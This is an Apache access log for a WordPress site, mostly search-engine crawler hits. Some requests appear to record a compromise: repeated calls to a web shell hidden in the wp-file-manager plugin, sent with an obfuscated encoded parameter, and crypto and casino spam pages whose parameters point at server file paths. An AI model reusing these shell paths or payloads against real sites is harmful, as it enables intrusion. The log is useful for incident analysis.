17.246.15.142 - - [26/Apr/2026:09:57:40 +0300] "GET /discover-the-future-of-crypto-trading-with-solscan/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/test HTTP/1.1" 200 8237 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.19.192 - - [26/Apr/2026:09:57:43 +0300] "GET /discover-the-power-of-solscan-for-crypto-traders-2/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/css/wp-embed-template-ie.css&path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/css HTTP/1.1" 200 4626 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:09:57:45 +0300] "GET /?detail/567014767 HTTP/1.1" 200 29365 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.23.38 - - [26/Apr/2026:09:57:47 +0300] "GET /ewolucja-kasyn-jak-historyczne-zmiany-wpyny-na/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/test HTTP/1.1" 200 8229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.13 - - [26/Apr/2026:09:57:49 +0300] "GET /unlocking-the-secrets-of-winning-strategies-in-casino-games/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/creame-whatsapp-me/gutenberg HTTP/1.1" 200 4326 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.19.195 - - [26/Apr/2026:09:57:52 +0300] "GET /maximizing-profits-with-jupiter-swap-trading/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke HTTP/1.1" 200 9428 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
54.39.89.17 - - [26/Apr/2026:09:57:56 +0300] "GET /shop/blinked/seriately05424991785.html HTTP/2" 200 8054 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [26/Apr/2026:09:55:58 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303135382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363535382q6261643633643033646136656365376362663931396238633239653965386561222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:09:57:57 +0300] "GET /?detail/59408593 HTTP/1.1" 200 29329 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:09:58:13 +0300] "GET /?detail/520262981 HTTP/1.1" 200 30147 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:58:18 +0300] "GET /?detail/74921300 HTTP/1.1" 200 30123 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:56:20 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303138302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363538302q3863323537663335386239613833326164346366386539663863393062383537222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
54.39.89.149 - - [26/Apr/2026:09:58:21 +0300] "GET /shop/unwary/compulsative061790131485.html HTTP/2" 200 8023 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:09:58:21 +0300] "GET /shop/overpassionately/tractitious28966441679.html HTTP/1.1" 200 28881 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
17.246.19.208 - - [26/Apr/2026:09:58:27 +0300] "GET /discover-tronscan-your-essential-guide-to-tron-asset-insights/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager/js HTTP/1.1" 200 4381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.19.179 - - [26/Apr/2026:09:58:29 +0300] "GET /exploring-the-differences-between-online-and-7/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages/continents-cities-el.po&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages HTTP/1.1" 200 14904 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:09:58:29 +0300] "GET /?detail/908690973 HTTP/1.1" 200 29019 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.15.248 - - [26/Apr/2026:09:58:32 +0300] "GET /discover-tronscan-your-essential-guide-to-tron-asset-insights/?path=/var/www/vhosts/miroglu.net/.cagefs/tmp HTTP/1.1" 200 15417 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:09:58:35 +0300] "GET /?prizes/55050111 HTTP/1.1" 200 28398 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:58:37 +0300] "GET /?detail/406271114 HTTP/1.1" 200 28597 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:56:42 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303230322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363630322q3239366430643661373733646161346364613365393631653532393336653566222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:09:58:42 +0300] "GET /?detail/899368674 HTTP/1.1" 200 30355 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:58:45 +0300] "GET /shop/ancome/crang532877298400.html HTTP/1.1" 200 28466 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
185.191.171.11 - - [26/Apr/2026:09:58:47 +0300] "GET /boost-your-trading-with-dexscreener-an-in-depth-analysis/ HTTP/1.1" 200 10055 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
148.113.128.87 - - [26/Apr/2026:09:58:47 +0300] "GET /shop/untolerable/anniversaries05649733753.html HTTP/2" 200 8036 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:09:58:47 +0300] "GET /?detail/295764675 HTTP/1.1" 200 28930 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:58:49 +0300] "GET /?detail/496294380 HTTP/1.1" 200 28457 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:09:58:51 +0300] "GET /?detail/694157078 HTTP/1.1" 200 30313 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:58:57 +0300] "GET /?detail/480790701 HTTP/1.1" 200 28005 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:58:59 +0300] "GET /?detail/781403868 HTTP/1.1" 200 29988 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.165 - - [26/Apr/2026:09:59:02 +0300] "GET /?detail/816839001 HTTP/1.1" 200 30023 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:57:04 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303232342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363632342q3461613562333433646165613563396262346131333964666630663361666366222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [26/Apr/2026:09:59:05 +0300] "GET /?prizes/108420222 HTTP/1.1" 200 29751 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:09:59:09 +0300] "GET /?detail/589211844 HTTP/1.1" 200 29679 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.114.139.148 - - [26/Apr/2026:09:59:12 +0300] "GET /shop/sycophantic/nocturnally011362908693.html HTTP/2" 200 8044 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:09:59:14 +0300] "GET /?detail/334413380 HTTP/1.1" 200 30230 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:59:16 +0300] "GET /?detail/390339132 HTTP/1.1" 200 29978 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:59:18 +0300] "GET /?detail/537673163 HTTP/1.1" 200 29305 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:59:22 +0300] "GET /?detail/442929773 HTTP/1.1" 200 30304 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:59:25 +0300] "GET /?detail/354825710 HTTP/1.1" 200 29936 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:57:26 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303234362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363634362q6535303262323862623535376465303034396463356434653737343261353466222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [26/Apr/2026:09:59:27 +0300] "GET /?detail/55970671 HTTP/1.1" 200 30152 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:09:59:29 +0300] "GET /?detail/385300848 HTTP/1.1" 200 30500 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
15.235.27.83 - - [26/Apr/2026:09:59:37 +0300] "GET /shop/spineback/postglenoid05894458995.html HTTP/2" 200 8009 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
5.133.192.187 - - [26/Apr/2026:09:59:43 +0300] "GET / HTTP/1.1" 200 10056 "http://miroglu.net/" "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A415F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3"
66.249.73.162 - - [26/Apr/2026:09:59:43 +0300] "GET /?detail/380025310 HTTP/1.1" 200 29511 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:57:48 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303236382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363636382q6530623664663739353632393735646438356632313739623065333936323530222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:09:59:47 +0300] "GET /shop/pragmatics/dissemination76826764739.html HTTP/1.1" 200 30084 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:09:59:50 +0300] "GET /?detail/631636914 HTTP/1.1" 200 30332 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:09:59:52 +0300] "GET /?detail/122839610 HTTP/1.1" 200 28599 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:59:57 +0300] "GET /?detail/763943625 HTTP/1.1" 200 30544 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.39.6.15 - - [26/Apr/2026:10:00:02 +0300] "GET /shop/dystocia/concisely05399900680.html HTTP/2" 200 8034 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:10:00:04 +0300] "GET /?detail/18134243 HTTP/1.1" 200 29928 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.75.218 - - [26/Apr/2026:10:00:09 +0300] "GET /an-in-depth-exploration-of-solscan-for-crypto-enthusiasts/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/elementor-beta/core HTTP/1.1" 200 4360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.164 - - [26/Apr/2026:10:00:09 +0300] "GET /?detail/239045319 HTTP/1.1" 200 28707 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:58:10 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303239302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363639302q3637656263343962386463303234333839663937616232366262636665616664222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
17.241.219.42 - - [26/Apr/2026:10:00:12 +0300] "GET /discover-the-benefits-of-using-ledger-live-app/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/blocks/post-author-biography/post-author-biography HTTP/1.1" 200 4332 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.250 - - [26/Apr/2026:10:00:15 +0300] "GET /discover-the-advantages-of-using-safepal-wallet-today/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/blocks/read-more HTTP/1.1" 200 4409 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.51 - - [26/Apr/2026:10:00:17 +0300] "GET /exploring-the-allure-of-high-stakes-casino-games-for-thrill-seekers/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/uploads/2025/09 HTTP/1.1" 200 4184 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:10:00:18 +0300] "GET /?detail/268357622 HTTP/1.1" 200 31284 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.75.78 - - [26/Apr/2026:10:00:20 +0300] "GET /experience-the-ease-of-crypto-with-atomic-wallet/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager HTTP/1.1" 200 4650 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.105 - - [26/Apr/2026:10:00:22 +0300] "GET /kraken-aktual-nye-ssylki-i-sovety-po-dostupu-2026-2/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/blogs HTTP/1.1" 200 6625 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:10:00:22 +0300] "GET /?detail/940331609 HTTP/1.1" 200 30062 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.219.250 - - [26/Apr/2026:10:00:24 +0300] "GET /discover-the-top-features-of-dexscreener-for-dex-trading/?path=/var/www/vhosts/miroglu.net/.cagefs/var/php HTTP/1.1" 200 6439 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:10:00:24 +0300] "GET /?detail/909498214 HTTP/1.1" 200 28625 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.39.89.128 - - [26/Apr/2026:10:00:26 +0300] "GET /shop/czechic/thereology061547381240.html HTTP/2" 200 8035 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.241.75.24 - - [26/Apr/2026:10:00:27 +0300] "GET /mastering-the-odds-essential-strategies-for-winning-at-casinos/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/test/php HTTP/1.1" 200 6955 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.219 - - [26/Apr/2026:10:00:30 +0300] "GET /discover-the-advantages-of-using-ledger-live-for-crypto-5/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/blocks/post-comments-form HTTP/1.1" 200 4585 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:10:00:29 +0300] "GET /?detail/316677021 HTTP/1.1" 200 29479 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:58:32 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139303331322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138363731322q3934626636623761306165343834626565356537663731353231353561373536222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
17.241.227.92 - - [26/Apr/2026:10:00:33 +0300] "GET /revolutionary-features-of-jupiter-swap-in-crypto-trading/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-systema-environment HTTP/1.1" 200 4259 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:10:00:33 +0300] "GET /?detail/439403168 HTTP/1.1" 200 28374 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.219.18 - - [26/Apr/2026:10:00:35 +0300] "GET /explore-the-comprehensive-features-of-atomic-wallet/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/elementor/modules/promotions HTTP/1.1" 200 4322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:10:00:35 +0300] "GET /?detail/30470392 HTTP/1.1" 200 28985 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:10:00:37 +0300] "GET /shop/easychair/riprapped122321737528.html HTTP/1.1" 200 28777 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
17.241.219.245 - - [26/Apr/2026:10:00:40 +0300] "GET /mastering-the-odds-essential-strategies-for-winning-at-casinos/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/js/tinymce/plugins/media HTTP/1.1" 200 4272 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.112 - - [26/Apr/2026:10:00:41 +0300] "GET /discovering-the-benefits-of-dexscreener-for-traders/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/elementor-beta HTTP/1.1" 200 4547 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.225 - - [26/Apr/2026:10:00:41 +0300] "GET /discover-the-features-of-atomic-wallet-for-crypto-management/?path=/var/www/vhosts/miroglu.net/.cagefs/var/spool HTTP/1.1" 200 6622 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
